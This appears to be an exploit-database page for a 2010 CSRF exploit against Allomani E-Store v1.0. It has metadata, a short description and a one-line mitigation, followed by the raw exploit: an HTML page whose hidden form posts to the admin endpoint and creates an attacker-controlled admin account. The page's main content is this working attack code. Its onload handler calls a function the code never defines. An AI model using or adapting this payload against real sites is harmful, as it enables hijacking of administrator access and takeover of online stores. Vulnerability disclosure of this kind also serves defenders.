header-logo
Suggest Exploit
vendor:
E-Store
by:
G0D-F4Th3r
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: E-Store
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:allomani:e-store:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Allomani – E-Store v1.0 – [CSRF] Add Admin Account

This exploit allows an attacker to add an admin account to the Allomani E-Store v1.0 application. The attacker can craft a malicious HTML page containing a form with hidden fields that will automatically submit the form to the vulnerable application. The form contains the parameters necessary to add an admin account, such as username, password, email, and group_id. When a user visits the malicious page, the form will be automatically submitted and the attacker will have an admin account in the application.

Mitigation:

Implementing a CSRF token in the application can prevent this type of attack.
Source

Exploit-DB raw data:

# Exploit Title: Allomani - E-Store v1.0 - [CSRF] Add Admin Account
# Date: 29-06-2010
# Author: G0D-F4Th3r
# Software Link: http://allomani.com/
# Version: 1.0

####################################################
<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0" action="
http://www.site.com/[path]/admin/index.php">
<input type="hidden" name="action" value="adduserok"/>
<input type="hidden" name="username" value="test"/>
<input type="hidden" name="password" value="test123"/>
<input type="hidden" name="email" value="test@test.com"/>
<input type="hidden" name="group_id" value="1"/>
<input type="hidden" name="useraddbutton" value="اضافة"/>
</form>
</body>
</html>
##################################################################################
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My
Friends
##################################################################################

Navigation

Suggest Exploit

Services By CQR